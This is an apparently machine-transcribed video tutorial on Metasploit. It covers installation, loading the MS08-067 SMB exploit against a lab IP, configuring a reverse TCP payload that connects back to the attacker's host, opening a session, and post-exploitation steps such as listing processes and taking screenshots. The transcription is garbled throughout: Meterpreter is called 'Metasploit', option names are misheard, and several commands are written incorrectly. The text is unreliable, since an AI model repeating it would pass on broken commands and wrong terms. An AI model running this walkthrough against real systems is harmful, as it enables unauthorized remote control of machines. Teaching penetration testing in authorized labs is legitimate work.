What's up everyone, and welcome back to the channel. If you're passionate about cybersecurity and ethical hacking, you've come to the right place. Today, we're jumping into one of the most powerful and popular tools in any penetration tester's arsenal. Metasploit. This isn't just a tool. It's a complete framework designed for developing, testing, and executing exploit code against a remote target machine. 2. It's an absolute game changer for understanding vulnerabilities and how to secure systems against them. So, whether you're a seasoned pro looking for a refresher or a beginner eager to learn, stick around. We're going to break down the essentials of Metasploit, from installation all the way to gaining a shell on a target system. This is a practical, hands-on tutorial, so get ready to follow along. And remember, all the activities we demonstrate today are for educational purposes and should only be performed on systems you have explicit permission to test. Let's get our keyboards ready and dive into the world of Metasploit. First things first, let's get Metasploit installed on our system. We'll be using a Debian-based Linux distribution, like Kali Linux or Ubuntu, for this demonstration. As Metasploit is often pre-installed or is only accessible, if it's not on your system, open up your terminal. The installation is straightforward. You'll just need to type sudo apt install Metasploit framework and hit enter. Your system will then ask for your password. Go ahead and type it in. The package manager will handle all the dependencies and get everything set up for you. This might take a few minutes depending on your internet connection and system speed, so it's a good time to grab a coffee. Once the installation is complete, you're ready to launch the beast. To start the Metasploit framework console, simply type masconsole into your terminal and press enter. You'll see this awesome ASCII art banner pop up, which means you're in. This console is your command center for everything we're about to do. It's an incredibly powerful interface with a huge number of commands, modules, and options. Don't be intimidated by it. We'll walk through the key commands you need to get started. Now that we have the Metasploit console open, let's explore how to find vulnerabilities to exploit. Metasploit has a massive, constantly updated database of exploits, auxiliary modules, and payloads. The search command is your best friend here. Let's say we're looking for an exploit related to a specific service, like SMB. The server message block protocol used in Windows. We can type search SMB Metasploit will then list all modules, exploits, scanners, and more that match that keyword. We'll see names, disclosure dates, ranks, and descriptions. The rank is particularly useful as it tells you how reliable an exploit is, from excellent to low. For this tutorial, we're going to use a classic, well-known exploit for demonstration purposes. MS08067. It's an old but perfect example for learning. To find it specifically, you could type search ms 08_067. 2. The search results will point you directly to the exploit module. Once you've identified the exploit you want to use, you need to tell Metasploit to load it. The command for that is use followed by the full path of the exploit. In our case, it would be use exploit Windows SMB at OMS 08067 netapi enter. After you hit enter, your command prompt will change, indicating that you're now within the context of that specific exploit module. With our exploit selected, the next step is to configure it. Every exploit needs specific information to work, like the target's IP address. To see what options we need to set, type Show Options. This will display a table of all the configurable parameters for the current module. We'll see things like ROASTs, which stands for Remote Hosts, and RPORT for Remote Port. The required column tells you which ones are mandatory. For MS08067, the most important option to set is RHOSTS, the IP address of our target machine. Let's say our target's IP is 192.168. 1.100. We would set this by typing set roasts 192.168. 1.100. Notice it's roasts, plural, as you can target multiple hosts. Now, an exploit is just the vehicle. We also need a payload. The payload is the code that will run on the target system after the exploit is successful. It's what gives us control. We can see available payloads for this exploit by typing show payloads. For this example, we'll use one of the most powerful payloads, the Metasploit. Let's choose the reverse TCP Metasploit payload. We set it by typing set payload Windows Metasploit reverse _ TCP. This payload will create a connection from the target machine back to us. Because it's a reverse connection, we also need to tell it where to connect back to. That's our own IP address. We use the LHOST option for this. Let's say our IP is 192.168.1.101. We'll type set LHOST 192.168.1.101. Always double-check your options with show options again to make sure everything is configured correctly before you launch the attack. Alright, the moment of truth has arrived. We've installed Metasploit, selected our exploit, and configured all the necessary options and our payload. Everything is set. To launch the exploit, the command is simple. Just type exploit or run and press enter. Metasploit will now attempt to exploit the vulnerability on the target machine. You'll see a series of status messages in the console, like started reverse TCP handler and sending state chip. If the exploit is successful, you'll see a glorious message that says something like Metasploit session 1 opened. And just like that, you have a shell. This isn't just any regular command prompt. It's a Metasploit session, which is an advanced feature-rich payload. You can now interact with the compromised system. To see your active sessions, you can use the sessions command. To connect to our new session, we type sessions I1. With 1 being the session ID, your prompt will change to Metasploit greater than. Now you're in control. You can do things like type sysinfo to get system information, PS2 list running processes, or even screenshot to take a picture of the target's desktop. This post-exploitation phase is where the real intelligence gathering happens. Whoa. When you're finished, you can type exit to leave the Metasploit session and then exit.